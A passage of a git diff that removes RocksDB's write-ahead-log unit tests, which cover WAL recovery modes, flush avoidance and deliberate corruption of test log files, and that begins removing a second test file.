-    // Now the original WAL is in log_files[0] and should be marked for
-    // recycling.
-    // Verify full purge cannot remove this file.
-    JobContext job_context(0);
-    dbfull()->TEST_LockMutex();
-    dbfull()->FindObsoleteFiles(&job_context, true /* force */);
-    dbfull()->TEST_UnlockMutex();
-    dbfull()->PurgeObsoleteFiles(job_context);
-
-    if (i == 0) {
-      ASSERT_OK(
-          env_->FileExists(LogFileName(dbname_, log_files[0]->LogNumber())));
-    } else {
-      ASSERT_OK(env_->FileExists(
-          LogFileName(alternative_wal_dir_, log_files[0]->LogNumber())));
-    }
-  }
-}
-
-TEST_F(DBWALTest, GetSortedWalFiles) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    VectorLogPtr log_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    ASSERT_EQ(0, log_files.size());
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    ASSERT_EQ(1, log_files.size());
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoveryWithLogDataForSomeCFs) {
-  // Test for regression of WAL cleanup missing files that don't contain data
-  // for every column family.
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    uint64_t earliest_log_nums[2];
-    for (int i = 0; i < 2; ++i) {
-      if (i > 0) {
-        ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-      }
-      VectorLogPtr log_files;
-      ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-      if (log_files.size() > 0) {
-        earliest_log_nums[i] = log_files[0]->LogNumber();
-      } else {
-        earliest_log_nums[i] = port::kMaxUint64;
-      }
-    }
-    // Check at least the first WAL was cleaned up during the recovery.
-    ASSERT_LT(earliest_log_nums[0], earliest_log_nums[1]);
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoverWithLargeLog) {
-  do {
-    {
-      Options options = CurrentOptions();
-      CreateAndReopenWithCF({"pikachu"}, options);
-      ASSERT_OK(Put(1, "big1", std::string(200000, '1')));
-      ASSERT_OK(Put(1, "big2", std::string(200000, '2')));
-      ASSERT_OK(Put(1, "small3", std::string(10, '3')));
-      ASSERT_OK(Put(1, "small4", std::string(10, '4')));
-      ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    }
-
-    // Make sure that if we re-open with a small write buffer size that
-    // we flush table files in the middle of a large log file.
-    Options options;
-    options.write_buffer_size = 100000;
-    options = CurrentOptions(options);
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 3);
-    ASSERT_EQ(std::string(200000, '1'), Get(1, "big1"));
-    ASSERT_EQ(std::string(200000, '2'), Get(1, "big2"));
-    ASSERT_EQ(std::string(10, '3'), Get(1, "small3"));
-    ASSERT_EQ(std::string(10, '4'), Get(1, "small4"));
-    ASSERT_GT(NumTableFilesAtLevel(0, 1), 1);
-  } while (ChangeWalOptions());
-}
-
-// In https://reviews.facebook.net/D20661 we change
-// recovery behavior: previously for each log file each column family
-// memtable was flushed, even it was empty. Now it's changed:
-// we try to create the smallest number of table files by merging
-// updates from multiple logs
-TEST_F(DBWALTest, RecoverCheckFileAmountWithSmallWriteBuffer) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 5000000;
-  CreateAndReopenWithCF({"pikachu", "dobrynia", "nikitich"}, options);
-
-  // Since we will reopen DB with smaller write_buffer_size,
-  // each key will go to new SST file
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-  ASSERT_OK(Put(1, Key(10), DummyString(1000000)));
-
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-  // Make 'dobrynia' to be flushed and new WAL file to be created
-  ASSERT_OK(Put(2, Key(10), DummyString(7500000)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-  {
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), static_cast<size_t>(1));
-    // Make sure 'dobrynia' was flushed: check sst files amount
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(1));
-  }
-  // New WAL file
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-  ASSERT_OK(Put(3, Key(10), DummyString(1)));
-
-  options.write_buffer_size = 4096;
-  options.arena_block_size = 4096;
-  ReopenWithColumnFamilies({"default", "pikachu", "dobrynia", "nikitich"},
-                           options);
-  {
-    // No inserts => default is empty
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(0));
-    // First 4 keys goes to separate SSTs + 1 more SST for 2 smaller keys
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(5));
-    // 1 SST for big key + 1 SST for small one
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(2));
-    // 1 SST for all keys
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(1));
-  }
-}
-
-// In https://reviews.facebook.net/D20661 we change
-// recovery behavior: previously for each log file each column family
-// memtable was flushed, even it wasn't empty. Now it's changed:
-// we try to create the smallest number of table files by merging
-// updates from multiple logs
-TEST_F(DBWALTest, RecoverCheckFileAmount) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000;
-  options.arena_block_size = 4 * 1024;
-  options.avoid_flush_during_recovery = false;
-  CreateAndReopenWithCF({"pikachu", "dobrynia", "nikitich"}, options);
-
-  ASSERT_OK(Put(0, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-
-  // Make 'nikitich' memtable to be flushed
-  ASSERT_OK(Put(3, Key(10), DummyString(1002400)));
-  ASSERT_OK(Put(3, Key(1), DummyString(1)));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[3]);
-  // 4 memtable are not flushed, 1 sst file
-  {
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), static_cast<size_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(1));
-  }
-  // Memtable for 'nikitich' has flushed, new WAL file has opened
-  // 4 memtable still not flushed
-
-  // Write to new WAL file
-  ASSERT_OK(Put(0, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-
-  // Fill up 'nikitich' one more time
-  ASSERT_OK(Put(3, Key(10), DummyString(1002400)));
-  // make it flush
-  ASSERT_OK(Put(3, Key(1), DummyString(1)));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[3]);
-  // There are still 4 memtable not flushed, and 2 sst tables
-  ASSERT_OK(Put(0, Key(1), DummyString(1)));
-  ASSERT_OK(Put(1, Key(1), DummyString(1)));
-  ASSERT_OK(Put(2, Key(1), DummyString(1)));
-
-  {
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), static_cast<size_t>(2));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(2));
-  }
-
-  ReopenWithColumnFamilies({"default", "pikachu", "dobrynia", "nikitich"},
-                           options);
-  {
-    std::vector<uint64_t> table_files = ListTableFiles(env_, dbname_);
-    // Check, that records for 'default', 'dobrynia' and 'pikachu' from
-    // first, second and third WALs  went to the same SST.
-    // So, there is 6 SSTs: three  for 'nikitich', one for 'default', one for
-    // 'dobrynia', one for 'pikachu'
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "default"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "nikitich"),
-              static_cast<uint64_t>(3));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "dobrynia"),
-              static_cast<uint64_t>(1));
-    ASSERT_EQ(GetNumberOfSstFilesForColumnFamily(db_, "pikachu"),
-              static_cast<uint64_t>(1));
-  }
-}
-
-TEST_F(DBWALTest, SyncMultipleLogs) {
-  const uint64_t kNumBatches = 2;
-  const int kBatchSize = 1000;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 4096;
-  Reopen(options);
-
-  WriteBatch batch;
-  WriteOptions wo;
-  wo.sync = true;
-
-  for (uint64_t b = 0; b < kNumBatches; b++) {
-    batch.Clear();
-    for (int i = 0; i < kBatchSize; i++) {
-      batch.Put(Key(i), DummyString(128));
-    }
-
-    dbfull()->Write(wo, &batch);
-  }
-
-  ASSERT_OK(dbfull()->SyncWAL());
-}
-
-// Github issue 1339. Prior the fix we read sequence id from the first log to
-// a local variable, then keep increase the variable as we replay logs,
-// ignoring actual sequence id of the records. This is incorrect if some writes
-// come with WAL disabled.
-TEST_F(DBWALTest, PartOfWritesWithWALDisabled) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  Options options = CurrentOptions();
-  options.env = fault_env.get();
-  options.disable_auto_compactions = true;
-  WriteOptions wal_on, wal_off;
-  wal_on.sync = true;
-  wal_on.disableWAL = false;
-  wal_off.disableWAL = true;
-  CreateAndReopenWithCF({"dummy"}, options);
-  ASSERT_OK(Put(1, "dummy", "d1", wal_on));  // seq id 1
-  ASSERT_OK(Put(1, "dummy", "d2", wal_off));
-  ASSERT_OK(Put(1, "dummy", "d3", wal_off));
-  ASSERT_OK(Put(0, "key", "v4", wal_on));  // seq id 4
-  ASSERT_OK(Flush(0));
-  ASSERT_OK(Put(0, "key", "v5", wal_on));  // seq id 5
-  ASSERT_EQ("v5", Get(0, "key"));
-  dbfull()->FlushWAL(false);
-  // Simulate a crash.
-  fault_env->SetFilesystemActive(false);
-  Close();
-  fault_env->ResetState();
-  ReopenWithColumnFamilies({"default", "dummy"}, options);
-  // Prior to the fix, we may incorrectly recover "v5" with sequence id = 3.
-  ASSERT_EQ("v5", Get(0, "key"));
-  // Destroy DB before destruct fault_env.
-  Destroy(options);
-}
-
-//
-// Test WAL recovery for the various modes available
-//
-class RecoveryTestHelper {
- public:
-  // Number of WAL files to generate
-  static const int kWALFilesCount = 10;
-  // Starting number for the WAL file name like 00010.log
-  static const int kWALFileOffset = 10;
-  // Keys to be written per WAL file
-  static const int kKeysPerWALFile = 133;
-  // Size of the value
-  static const int kValueSize = 96;
-
-  // Create WAL files with values filled in
-  static void FillData(DBWALTest* test, const Options& options,
-                       const size_t wal_count, size_t* count) {
-    const ImmutableDBOptions db_options(options);
-
-    *count = 0;
-
-    shared_ptr<Cache> table_cache = NewLRUCache(50, 0);
-    EnvOptions env_options;
-    WriteBufferManager write_buffer_manager(db_options.db_write_buffer_size);
-
-    unique_ptr<VersionSet> versions;
-    unique_ptr<WalManager> wal_manager;
-    WriteController write_controller;
-
-    versions.reset(new VersionSet(test->dbname_, &db_options, env_options,
-                                  table_cache.get(), &write_buffer_manager,
-                                  &write_controller));
-
-    wal_manager.reset(new WalManager(db_options, env_options));
-
-    std::unique_ptr<log::Writer> current_log_writer;
-
-    for (size_t j = kWALFileOffset; j < wal_count + kWALFileOffset; j++) {
-      uint64_t current_log_number = j;
-      std::string fname = LogFileName(test->dbname_, current_log_number);
-      unique_ptr<WritableFile> file;
-      ASSERT_OK(db_options.env->NewWritableFile(fname, &file, env_options));
-      unique_ptr<WritableFileWriter> file_writer(
-          new WritableFileWriter(std::move(file), env_options));
-      current_log_writer.reset(
-          new log::Writer(std::move(file_writer), current_log_number,
-                          db_options.recycle_log_file_num > 0));
-
-      WriteBatch batch;
-      for (int i = 0; i < kKeysPerWALFile; i++) {
-        std::string key = "key" + ToString((*count)++);
-        std::string value = test->DummyString(kValueSize);
-        assert(current_log_writer.get() != nullptr);
-        uint64_t seq = versions->LastSequence() + 1;
-        batch.Clear();
-        batch.Put(key, value);
-        WriteBatchInternal::SetSequence(&batch, seq);
-        current_log_writer->AddRecord(WriteBatchInternal::Contents(&batch));
-        versions->SetLastToBeWrittenSequence(seq);
-        versions->SetLastSequence(seq);
-      }
-    }
-  }
-
-  // Recreate and fill the store with some data
-  static size_t FillData(DBWALTest* test, Options* options) {
-    options->create_if_missing = true;
-    test->DestroyAndReopen(*options);
-    test->Close();
-
-    size_t count = 0;
-    FillData(test, *options, kWALFilesCount, &count);
-    return count;
-  }
-
-  // Read back all the keys we wrote and return the number of keys found
-  static size_t GetData(DBWALTest* test) {
-    size_t count = 0;
-    for (size_t i = 0; i < kWALFilesCount * kKeysPerWALFile; i++) {
-      if (test->Get("key" + ToString(i)) != "NOT_FOUND") {
-        ++count;
-      }
-    }
-    return count;
-  }
-
-  // Manuall corrupt the specified WAL
-  static void CorruptWAL(DBWALTest* test, const Options& options,
-                         const double off, const double len,
-                         const int wal_file_id, const bool trunc = false) {
-    Env* env = options.env;
-    std::string fname = LogFileName(test->dbname_, wal_file_id);
-    uint64_t size;
-    ASSERT_OK(env->GetFileSize(fname, &size));
-    ASSERT_GT(size, 0);
-#ifdef OS_WIN
-    // Windows disk cache behaves differently. When we truncate
-    // the original content is still in the cache due to the original
-    // handle is still open. Generally, in Windows, one prohibits
-    // shared access to files and it is not needed for WAL but we allow
-    // it to induce corruption at various tests.
-    test->Close();
-#endif
-    if (trunc) {
-      ASSERT_EQ(0, truncate(fname.c_str(), static_cast<int64_t>(size * off)));
-    } else {
-      InduceCorruption(fname, static_cast<size_t>(size * off + 8),
-                       static_cast<size_t>(size * len));
-    }
-  }
-
-  // Overwrite data with 'a' from offset for length len
-  static void InduceCorruption(const std::string& filename, size_t offset,
-                               size_t len) {
-    ASSERT_GT(len, 0U);
-
-    int fd = open(filename.c_str(), O_RDWR);
-
-    // On windows long is 32-bit
-    ASSERT_LE(offset, std::numeric_limits<long>::max());
-
-    ASSERT_GT(fd, 0);
-    ASSERT_EQ(offset, lseek(fd, static_cast<long>(offset), SEEK_SET));
-
-    void* buf = alloca(len);
-    memset(buf, 'b', len);
-    ASSERT_EQ(len, write(fd, buf, static_cast<unsigned int>(len)));
-
-    close(fd);
-  }
-};
-
-// Test scope:
-// - We expect to open the data store when there is incomplete trailing writes
-// at the end of any of the logs
-// - We do not expect to open the data store for corruption
-TEST_F(DBWALTest, kTolerateCorruptedTailRecords) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-
-  for (auto trunc : {true, false}) {        /* Corruption style */
-    for (int i = 0; i < 3; i++) {           /* Corruption offset position */
-      for (int j = jstart; j < jend; j++) { /* WAL file */
-        // Fill data for testing
-        Options options = CurrentOptions();
-        const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-        // test checksum failure or parsing
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, /*wal=*/j, trunc);
-
-        if (trunc) {
-          options.wal_recovery_mode =
-              WALRecoveryMode::kTolerateCorruptedTailRecords;
-          options.create_if_missing = false;
-          ASSERT_OK(TryReopen(options));
-          const size_t recovered_row_count = RecoveryTestHelper::GetData(this);
-          ASSERT_TRUE(i == 0 || recovered_row_count > 0);
-          ASSERT_LT(recovered_row_count, row_count);
-        } else {
-          options.wal_recovery_mode =
-              WALRecoveryMode::kTolerateCorruptedTailRecords;
-          ASSERT_NOK(TryReopen(options));
-        }
-      }
-    }
-  }
-}
-
-// Test scope:
-// We don't expect the data store to be opened if there is any corruption
-// (leading, middle or trailing -- incomplete writes or corruption)
-TEST_F(DBWALTest, kAbsoluteConsistency) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-
-  // Verify clean slate behavior
-  Options options = CurrentOptions();
-  const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-  options.wal_recovery_mode = WALRecoveryMode::kAbsoluteConsistency;
-  options.create_if_missing = false;
-  ASSERT_OK(TryReopen(options));
-  ASSERT_EQ(RecoveryTestHelper::GetData(this), row_count);
-
-  for (auto trunc : {true, false}) { /* Corruption style */
-    for (int i = 0; i < 4; i++) {    /* Corruption offset position */
-      if (trunc && i == 0) {
-        continue;
-      }
-
-      for (int j = jstart; j < jend; j++) { /* wal files */
-        // fill with new date
-        RecoveryTestHelper::FillData(this, &options);
-        // corrupt the wal
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, j, trunc);
-        // verify
-        options.wal_recovery_mode = WALRecoveryMode::kAbsoluteConsistency;
-        options.create_if_missing = false;
-        ASSERT_NOK(TryReopen(options));
-      }
-    }
-  }
-}
-
-// Test scope:
-// - We expect to open data store under all circumstances
-// - We expect only data upto the point where the first error was encountered
-TEST_F(DBWALTest, kPointInTimeRecovery) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-  const int maxkeys =
-      RecoveryTestHelper::kWALFilesCount * RecoveryTestHelper::kKeysPerWALFile;
-
-  for (auto trunc : {true, false}) {        /* Corruption style */
-    for (int i = 0; i < 4; i++) {           /* Offset of corruption */
-      for (int j = jstart; j < jend; j++) { /* WAL file */
-        // Fill data for testing
-        Options options = CurrentOptions();
-        const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-
-        // Corrupt the wal
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, j, trunc);
-
-        // Verify
-        options.wal_recovery_mode = WALRecoveryMode::kPointInTimeRecovery;
-        options.create_if_missing = false;
-        ASSERT_OK(TryReopen(options));
-
-        // Probe data for invariants
-        size_t recovered_row_count = RecoveryTestHelper::GetData(this);
-        ASSERT_LT(recovered_row_count, row_count);
-
-        bool expect_data = true;
-        for (size_t k = 0; k < maxkeys; ++k) {
-          bool found = Get("key" + ToString(i)) != "NOT_FOUND";
-          if (expect_data && !found) {
-            expect_data = false;
-          }
-          ASSERT_EQ(found, expect_data);
-        }
-
-        const size_t min = RecoveryTestHelper::kKeysPerWALFile *
-                           (j - RecoveryTestHelper::kWALFileOffset);
-        ASSERT_GE(recovered_row_count, min);
-        if (!trunc && i != 0) {
-          const size_t max = RecoveryTestHelper::kKeysPerWALFile *
-                             (j - RecoveryTestHelper::kWALFileOffset + 1);
-          ASSERT_LE(recovered_row_count, max);
-        }
-      }
-    }
-  }
-}
-
-// Test scope:
-// - We expect to open the data store under all scenarios
-// - We expect to have recovered records past the corruption zone
-TEST_F(DBWALTest, kSkipAnyCorruptedRecords) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-
-  for (auto trunc : {true, false}) {        /* Corruption style */
-    for (int i = 0; i < 4; i++) {           /* Corruption offset */
-      for (int j = jstart; j < jend; j++) { /* wal files */
-        // Fill data for testing
-        Options options = CurrentOptions();
-        const size_t row_count = RecoveryTestHelper::FillData(this, &options);
-
-        // Corrupt the WAL
-        RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                       /*len%=*/.1, j, trunc);
-
-        // Verify behavior
-        options.wal_recovery_mode = WALRecoveryMode::kSkipAnyCorruptedRecords;
-        options.create_if_missing = false;
-        ASSERT_OK(TryReopen(options));
-
-        // Probe data for invariants
-        size_t recovered_row_count = RecoveryTestHelper::GetData(this);
-        ASSERT_LT(recovered_row_count, row_count);
-
-        if (!trunc) {
-          ASSERT_TRUE(i != 0 || recovered_row_count > 0);
-        }
-      }
-    }
-  }
-}
-
-TEST_F(DBWALTest, AvoidFlushDuringRecovery) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.avoid_flush_during_recovery = false;
-
-  // Test with flush after recovery.
-  Reopen(options);
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_OK(Put("bar", "v2"));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put("foo", "v3"));
-  ASSERT_OK(Put("bar", "v4"));
-  ASSERT_EQ(1, TotalTableFiles());
-  // Reopen DB. Check if WAL logs flushed.
-  Reopen(options);
-  ASSERT_EQ("v3", Get("foo"));
-  ASSERT_EQ("v4", Get("bar"));
-  ASSERT_EQ(2, TotalTableFiles());
-
-  // Test without flush after recovery.
-  options.avoid_flush_during_recovery = true;
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo", "v5"));
-  ASSERT_OK(Put("bar", "v6"));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put("foo", "v7"));
-  ASSERT_OK(Put("bar", "v8"));
-  ASSERT_EQ(1, TotalTableFiles());
-  // Reopen DB. WAL logs should not be flushed this time.
-  Reopen(options);
-  ASSERT_EQ("v7", Get("foo"));
-  ASSERT_EQ("v8", Get("bar"));
-  ASSERT_EQ(1, TotalTableFiles());
-
-  // Force flush with allow_2pc.
-  options.avoid_flush_during_recovery = true;
-  options.allow_2pc = true;
-  ASSERT_OK(Put("foo", "v9"));
-  ASSERT_OK(Put("bar", "v10"));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put("foo", "v11"));
-  ASSERT_OK(Put("bar", "v12"));
-  Reopen(options);
-  ASSERT_EQ("v11", Get("foo"));
-  ASSERT_EQ("v12", Get("bar"));
-  ASSERT_EQ(2, TotalTableFiles());
-}
-
-TEST_F(DBWALTest, WalCleanupAfterAvoidFlushDuringRecovery) {
-  // Verifies WAL files that were present during recovery, but not flushed due
-  // to avoid_flush_during_recovery, will be considered for deletion at a later
-  // stage. We check at least one such file is deleted during Flush().
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.avoid_flush_during_recovery = true;
-  Reopen(options);
-
-  ASSERT_OK(Put("foo", "v1"));
-  Reopen(options);
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      // Flush() triggers deletion of obsolete tracked files
-      Flush();
-    }
-    VectorLogPtr log_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    if (i == 0) {
-      ASSERT_GT(log_files.size(), 0);
-    } else {
-      ASSERT_EQ(0, log_files.size());
-    }
-  }
-}
-
-TEST_F(DBWALTest, RecoverWithoutFlush) {
-  Options options = CurrentOptions();
-  options.avoid_flush_during_recovery = true;
-  options.create_if_missing = false;
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 64 * 1024 * 1024;
-
-  size_t count = RecoveryTestHelper::FillData(this, &options);
-  auto validateData = [this, count]() {
-    for (size_t i = 0; i < count; i++) {
-      ASSERT_NE(Get("key" + ToString(i)), "NOT_FOUND");
-    }
-  };
-  Reopen(options);
-  validateData();
-  // Insert some data without flush
-  ASSERT_OK(Put("foo", "foo_v1"));
-  ASSERT_OK(Put("bar", "bar_v1"));
-  Reopen(options);
-  validateData();
-  ASSERT_EQ(Get("foo"), "foo_v1");
-  ASSERT_EQ(Get("bar"), "bar_v1");
-  // Insert again and reopen
-  ASSERT_OK(Put("foo", "foo_v2"));
-  ASSERT_OK(Put("bar", "bar_v2"));
-  Reopen(options);
-  validateData();
-  ASSERT_EQ(Get("foo"), "foo_v2");
-  ASSERT_EQ(Get("bar"), "bar_v2");
-  // manual flush and insert again
-  Flush();
-  ASSERT_EQ(Get("foo"), "foo_v2");
-  ASSERT_EQ(Get("bar"), "bar_v2");
-  ASSERT_OK(Put("foo", "foo_v3"));
-  ASSERT_OK(Put("bar", "bar_v3"));
-  Reopen(options);
-  validateData();
-  ASSERT_EQ(Get("foo"), "foo_v3");
-  ASSERT_EQ(Get("bar"), "bar_v3");
-}
-
-TEST_F(DBWALTest, RecoverWithoutFlushMultipleCF) {
-  const std::string kSmallValue = "v";
-  const std::string kLargeValue = DummyString(1024);
-  Options options = CurrentOptions();
-  options.avoid_flush_during_recovery = true;
-  options.create_if_missing = false;
-  options.disable_auto_compactions = true;
-
-  auto countWalFiles = [this]() {
-    VectorLogPtr log_files;
-    dbfull()->GetSortedWalFiles(log_files);
-    return log_files.size();
-  };
-
-  // Create DB with multiple column families and multiple log files.
-  CreateAndReopenWithCF({"one", "two"}, options);
-  ASSERT_OK(Put(0, "key1", kSmallValue));
-  ASSERT_OK(Put(1, "key2", kLargeValue));
-  Flush(1);
-  ASSERT_EQ(1, countWalFiles());
-  ASSERT_OK(Put(0, "key3", kSmallValue));
-  ASSERT_OK(Put(2, "key4", kLargeValue));
-  Flush(2);
-  ASSERT_EQ(2, countWalFiles());
-
-  // Reopen, insert and flush.
-  options.db_write_buffer_size = 64 * 1024 * 1024;
-  ReopenWithColumnFamilies({"default", "one", "two"}, options);
-  ASSERT_EQ(Get(0, "key1"), kSmallValue);
-  ASSERT_EQ(Get(1, "key2"), kLargeValue);
-  ASSERT_EQ(Get(0, "key3"), kSmallValue);
-  ASSERT_EQ(Get(2, "key4"), kLargeValue);
-  // Insert more data.
-  ASSERT_OK(Put(0, "key5", kLargeValue));
-  ASSERT_OK(Put(1, "key6", kLargeValue));
-  ASSERT_EQ(3, countWalFiles());
-  Flush(1);
-  ASSERT_OK(Put(2, "key7", kLargeValue));
-  dbfull()->FlushWAL(false);
-  ASSERT_EQ(4, countWalFiles());
-
-  // Reopen twice and validate.
-  for (int i = 0; i < 2; i++) {
-    ReopenWithColumnFamilies({"default", "one", "two"}, options);
-    ASSERT_EQ(Get(0, "key1"), kSmallValue);
-    ASSERT_EQ(Get(1, "key2"), kLargeValue);
-    ASSERT_EQ(Get(0, "key3"), kSmallValue);
-    ASSERT_EQ(Get(2, "key4"), kLargeValue);
-    ASSERT_EQ(Get(0, "key5"), kLargeValue);
-    ASSERT_EQ(Get(1, "key6"), kLargeValue);
-    ASSERT_EQ(Get(2, "key7"), kLargeValue);
-    ASSERT_EQ(4, countWalFiles());
-  }
-}
-
-// In this test we are trying to do the following:
-//   1. Create a DB with corrupted WAL log;
-//   2. Open with avoid_flush_during_recovery = true;
-//   3. Append more data without flushing, which creates new WAL log.
-//   4. Open again. See if it can correctly handle previous corruption.
-TEST_F(DBWALTest, RecoverFromCorruptedWALWithoutFlush) {
-  const int jstart = RecoveryTestHelper::kWALFileOffset;
-  const int jend = jstart + RecoveryTestHelper::kWALFilesCount;
-  const int kAppendKeys = 100;
-  Options options = CurrentOptions();
-  options.avoid_flush_during_recovery = true;
-  options.create_if_missing = false;
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 64 * 1024 * 1024;
-
-  auto getAll = [this]() {
-    std::vector<std::pair<std::string, std::string>> data;
-    ReadOptions ropt;
-    Iterator* iter = dbfull()->NewIterator(ropt);
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      data.push_back(
-          std::make_pair(iter->key().ToString(), iter->value().ToString()));
-    }
-    delete iter;
-    return data;
-  };
-  for (auto& mode : wal_recovery_mode_string_map) {
-    options.wal_recovery_mode = mode.second;
-    for (auto trunc : {true, false}) {
-      for (int i = 0; i < 4; i++) {
-        for (int j = jstart; j < jend; j++) {
-          // Create corrupted WAL
-          RecoveryTestHelper::FillData(this, &options);
-          RecoveryTestHelper::CorruptWAL(this, options, /*off=*/i * .3,
-                                         /*len%=*/.1, /*wal=*/j, trunc);
-          // Skip the test if DB won't open.
-          if (!TryReopen(options).ok()) {
-            ASSERT_TRUE(options.wal_recovery_mode ==
-                            WALRecoveryMode::kAbsoluteConsistency ||
-                        (!trunc &&
-                         options.wal_recovery_mode ==
-                             WALRecoveryMode::kTolerateCorruptedTailRecords));
-            continue;
-          }
-          ASSERT_OK(TryReopen(options));
-          // Append some more data.
-          for (int k = 0; k < kAppendKeys; k++) {
-            std::string key = "extra_key" + ToString(k);
-            std::string value = DummyString(RecoveryTestHelper::kValueSize);
-            ASSERT_OK(Put(key, value));
-          }
-          // Save data for comparison.
-          auto data = getAll();
-          // Reopen. Verify data.
-          ASSERT_OK(TryReopen(options));
-          auto actual_data = getAll();
-          ASSERT_EQ(data, actual_data);
-        }
-      }
-    }
-  }
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBWALTest, WalTermTest) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-
-  WriteOptions wo;
-  wo.sync = true;
-  wo.disableWAL = false;
-
-  WriteBatch batch;
-  batch.Put("foo", "bar");
-  batch.MarkWalTerminationPoint();
-  batch.Put("foo2", "bar2");
-
-  ASSERT_OK(dbfull()->Write(wo, &batch));
-
-  // make sure we can re-open it.
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-  ASSERT_EQ("bar", Get(1, "foo"));
-  ASSERT_EQ("NOT_FOUND", Get(1, "foo2"));
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_write_test.cc b/thirdparty/rocksdb/db/db_write_test.cc
deleted file mode 100644
index 726f444..0000000
--- a/thirdparty/rocksdb/db/db_write_test.cc
+++ /dev/null
@@ -1,81 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
